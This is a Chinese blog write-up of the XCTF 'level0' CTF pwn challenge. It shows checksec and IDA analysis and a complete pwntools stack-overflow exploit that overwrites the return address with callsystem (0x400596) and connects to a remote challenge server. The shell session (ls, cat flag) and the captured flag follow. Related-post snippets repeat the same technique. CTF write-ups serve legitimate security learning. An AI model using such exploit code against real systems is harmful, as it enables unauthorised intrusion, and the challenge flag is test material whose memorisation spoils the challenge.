攻防世界 Pwn level0

最新推荐文章于 2023-03-12 17:46:55 发布

==Microsoft==

最新推荐文章于 2023-03-12 17:46:55 发布

阅读量163

点赞数 1

分类专栏： Pwn 文章标签： pwn

本文链接：https://blog.csdn.net/MrTreebook/article/details/118713363

版权

Pwn 专栏收录该内容

57 篇文章 3 订阅

订阅专栏

攻防世界 Pwn level0

在这里插入图片描述
下载本地文件拉到Kali

1. 检查文件

file level0
checksec level0

在这里插入图片描述
没有开任何保护

2. 拉进IDA看一下

在这里插入图片描述

在这里看到了 ”bin/sh"
可以在这里获取shell权限
目标明确
看到了vulnerable_function

很明显是栈溢出的操作
看一下栈空间

buf上需要覆盖 80-0+8 大小的数据
r 上弹 callsystem的地址即可

3. 开始写exp

##coding=utf8
from pwn import *
## 构造与程序交互的对象
content=0

if content==1:
    p = process('./level0')
else:
    p = remote("111.200.241.244",61229)

payload = b'a' * (0x80 + 8) 
payload = payload + p64(0x400596)

p.recvuntil("Hello, World\n")
p.sendline(payload)

p.interactive()

4. 运行一下写好的exp

./exp_level0.py

在这里插入图片描述

ls

ls遍历一下获取的目录
看到有一个flag文件
cat一下这个文件

cat flag

得到了我们想要的flag

cyberpeace{d9b70c7495ebc38b58293049dbad47c6}

5.题目下载地址

点击下载

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

==Microsoft==

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

攻防世界(pwn篇)---level0

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

04-13

1611

攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述菜鸡了解了什么是溢出，他相信自己能得到shell 基本情况分析发现只开启了 NX(数据不可执行)保护机制，因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO，如果开启FULL RELRO，意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢

攻防世界(pwn篇)---level2

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

04-15

1554

攻防世界(pwn篇)—level2 文章目录攻防世界(pwn篇)---level2题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述菜鸡了解了什么是溢出，他相信自己能得到shell 基本情况分析发现只开启了 NX(数据不可执行)保护机制，因此可以做栈溢出漏洞攻击。运行分析 IDA 分析 ssize_t vulnerable_function() { char buf[136]; // [esp+0h] [ebp-88h] BYREF system("echo

参与评论您还未登录，请先登录后发表或查看评论

攻防世界PWN题——level0

Greic的博客

12-01

3520

嘿嘿，又是我，我又肥来了。今天带来的是攻防世界第三题的writeup，这次话不多说，我们直接进入主题。无论怎么样，pwn题前两步少不了——查看文件类型和保护类型： 64位linux操作系统，只开了NX保护，再打开IDA看看。将Hello,World显示到屏幕上，再点开函数看看：可以看到，buf是分配了80个字节（从rbp-80-rbp+0),但是read函数读入了0x200字节，因此，这里明显有栈溢出，再点开buff看看：可以看到，我们只需要将buf和s覆盖，也就...

攻防世界pwn新手练习（level0）

BurYiA的博客

10-24

994

level0 老规矩哦，我们先checksec一下，收集一下信息 64位程序，开了NX，没啥说的，还在接受范围内，运行一下试试唔，没啥东西，继续IDA吧。（╯‵□′）╯︵┴─┴ emmm，主函数倒是挺简单的，就一行打印，一行输入但…不知你们有米有发现有个很奇怪的函数名，我们悄悄的瞅一瞅果然不对劲，首先它的名字中有个system（手动加粗），这个是什么东西嘞，简单的来说，它拥有系统的最高...

攻防世界新手题（PWN——level0）

0pt1mus

12-19

1130

level0 转载自：superj.site的博客 0x00 首先，进行通过file判断附件文件类型。判断是ELF文件。这时就可以通过checksec判断文件的保护措施。得到只开启了执行保护，地址随机化、栈保护都没有开启。 0x01 开始IDA逆向分析。在其中发现了main、vulnerable_function、callsystem函数逐个查看这三个函数。发现该题中用到了w...

攻防世界pwn题level0

Sakura给爷pwn全场

09-02

318

查壳64bit 拖进IDA f5查看伪代码 vulnerable_function中文译为脆弱函数，可疑，点进去查看vulnerable函数。 buf数组距离栈帧顶部rsp为0h，距离栈帧顶部rbp为80h，可知buf长度为0x80. 查看vulnerable函数栈 s代表save ebp,长度8个字节 r代表return address,长度8个字节,通常只要覆盖4个字节。查看callsystem函数，代码段地址为0x400596 思路把return address用callsystem函数

攻防世界pwn-level0详细步骤

m0_74047686的博客

02-28

1428

学习pwn开始，慢慢来不要急

初学pwn-攻防世界(level0)

天柱的博客

08-27

1041

初学pwn-writeUp 攻防世界的第三道题目，level0。首先还是先创建场景，使用nc进入远端，发现输出了一个Hello，World，之后什么都没有了，使用ls也没有反应，说明这需要我们获取shell了。下载文件，先用checksec查看一下这里简单介绍一些checksec这个工具： 1、Relro：No Relro（重定位表只读）　　Relocation Read Only，重定位表只读。重定位表即.got 和 .plt 两个表。　　RELRO会有No RELRO、Partial RE

【攻防世界pwn-level2】

a_silly_coder的博客

01-14

271

下载文件后，首先查看保护将文件拖入ida 32位，发现函数名明示了攻击点点进vulnerable_function函数后，发现buf距离ebp有0x88的距离，但是可以读入0x100的大小，确定这是一道栈溢出的题目，溢出点就在此处。确定溢出点后，开始寻找利用方式，发现代码中给出了system函数，在0x8048320的位置随后寻找sh或者bin_sh字符串：此时要素齐全，开始编写脚本。设计栈的结构为：脚本为：发送脚本，开始攻击： ...

pwn_level0

qq_42956710的博客

08-15

2668

level0(deepin解题记录) 打开链接：判断了下文件类型及其保护在终端里面运行一下： 64位的,所以就用idax64打开看一下数据位置：其中有bin/sh，里面有几个函数需要看看，callsystem,main,read，vulnerable_function 栈溢出，由于没有NX保护和开栈保护，为了得到shell，可以找一个输入没有限制的...

level0 -- 攻防世界新手题

01-19

来自攻防世界的pwn题，是一道简单的新手样本题目，但由于不同linux的libc版本，会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接：https://blog.csdn.net/A951860555/article/details/112849849

攻防世界PWN-level0

Deeeelete的博客

11-12

2730

题目：level0 老规矩先进PE 查看是64位程序，可以考虑直接IDA莽，也可以进checksec查一下详细参数比较脆，无PIE且没了栈保护（Stack-canary），容易GOT改写（ RELRO）简单运行一遍，发现是hello word 进64位IDA 鼠标悬停在main函数上按f5反编译查看源码：过于简单，没啥可用的信息，双击它return的脆弱函数进一步查看 int __cdecl main(int argc, const char **argv, const

[攻防世界 pwn]——level0

Y_peak的博客

02-18

189

[攻防世界 pwn]——level0

攻防世界pwn level0做题思路

nzw1134864657的博客

07-24

1864

先看看题目的各种保护机制栈不可以执行，我们用IDA打开看看写进一个hello world的字符串，然后执行vulnerable_function（）函数跟进函数里查看这里我不是特别理解，writeup上是这样写的 “这是 vulnerable_function 函数，可以在栈上写0x200个字节，或许我们可以进行溢出，覆盖掉返回地址，劫持程序执行流，执行我们想执行的方法。通常我们的目...

攻防世界pwn新手练习区——level0

smsyz2019的博客

10-31

1685

这是一个简单的利用栈溢出漏洞进行简单的ROP 下载附件，将程序放进虚拟机中拿到程序首先检查程序开启了什么保护,输入 checksec 程序名称 checksec level0 可以看到这是一个64位程序，只开启了NX保护。NX保护简单来说就是代码不可执行。例如你向栈上输入一段shellcode，那么NX保护就是防止这个shellcode的执行。具体内容和其他的程序保护可以参考这个博客。l...

攻防世界-pwn新手区-level0

CHAWUCIREN1的博客

07-26

256

下载附件，执行一下，64位程序 checksec一下 NX执行保护开启丢进ida里面分析一下 F5反编译发现return到一个函数里面，点击查看一下发现申请的栈空间是0x80，read的值却是0x200，说明存在栈溢出然后点击callsystem这个函数，发现shell，也就是说我们需要利用栈溢出覆盖到callsystem函数的返回地址0x400596执行shell。查看buf的栈空间 shell_addr = 0x400596 payload = ‘A’*(0x80+8) + p.

JarvisOJ-PWN-Level0

杀生丸？不，其实我要的是桔梗

03-15

787

JarvisOJ-PWN-Level0 IDA打开分析。在Export找到这两个关键函数。先双击进入main 关键函数在vulnerable_function()，继续跟进。可以看出read函数是把标准输入的200位的写入buf中。再看buf：低位：高位：所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...

BUUCTF pwn——level0

CNS-Enterprise BCC-1701-J

03-12

169

BUUCTF 做题练习

pwn level0--沙窝里的王

weixin_43600412的博客

07-23

219

下载文件后查看属性，发现不认识，语言编译器打开后是一堆64位编码，看不到信息，载入IDA查看主函数的C语言形式：显示读入“hello world”，下面的 vulnerable_function函数有hello world作为参数，点开后却发现与hello world没多大关系: 程序显示buf长度为0x80，即0x80h填充满，之后跟上地址就可以实现任意跳转。 shift+F12查找字符串：...

攻防世界 pwn repeater